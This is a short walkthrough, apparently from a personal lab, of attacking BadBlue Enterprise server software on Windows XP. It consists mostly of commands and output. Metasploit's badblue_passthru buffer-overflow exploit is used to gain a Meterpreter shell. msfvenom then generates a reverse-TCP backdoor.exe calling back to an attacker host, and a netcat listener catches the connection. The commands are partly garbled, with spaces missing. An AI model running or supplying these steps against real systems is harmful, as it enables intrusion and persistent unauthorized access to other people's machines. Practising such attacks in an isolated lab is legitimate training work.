Windows XP Professional 32 Bit
Running Bad Blue Enterprise - Windows Server Software
Breakdown
We'll be using Metasploit to generate an exploit and pass a payload to the target system in hopes of being able to own the shell.
MSFCONSOLE
In the following example we'll use a known vulnerability to access the target system and create a remote shell.
# Start the MSFCONSOLE as super userkali@kali:~$sudomsfconsolemsf5># Now search for badblue exploitsmsf5>searchbadblue0exploit/windows/http/badblue_ext_overflow1exploit/windows/http/badblue_passthru# Lets use the second option ( 1 ) as a PassThru Buffer Overflowmsf5>1msf5exploit(windows/http/badblue_passthru) >msf5exploit(windows/http/badblue_passthru) >showoptionsNameSettingRequired-------------------ProxiesnoRHOSTS192.168.0.1yesRPORT80yesSSLfalsenoVHOSTno# Set the host targetmsf5exploit(windows/http/badblue_passthru) >setrhosts192.168.0.1rhosts =>192.168.0.1msf5exploit(windows/http/badblue_passthru) >run[*] Meterpeter session 2 opened (192.168.0.102:1054) at 2020-11-11 01:25:33# Shell openedmeterpeter>shellC:\ProgramFiles\BadBlue\EE>
The remote shell has been created. From here we can generate a payload to inject into the system using msfvenom.
# Genereate the payloadkali@kali:~$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.102 LPORT=1234 -a x86 -b "\x00\x0a\x0d" -f exe > backdoor.exe
# We can move the payload over to the target machine using meterpeter and the new shell# Start a netcat connection to the target machinekali@kali:~$nc-vlp1234listeningon [any] 1234 ...# Once we run the backdoor on the target machine, it will make a connection to usconnectto [192.168.0.102] from (UNKOWN) [192.168.0.102] 1056(C) Copyright 1985-2001 Microsoft Corp.C:\DocumentsandSettings\User\Desktop># We now have access to the target system shell and a backdoor to connect to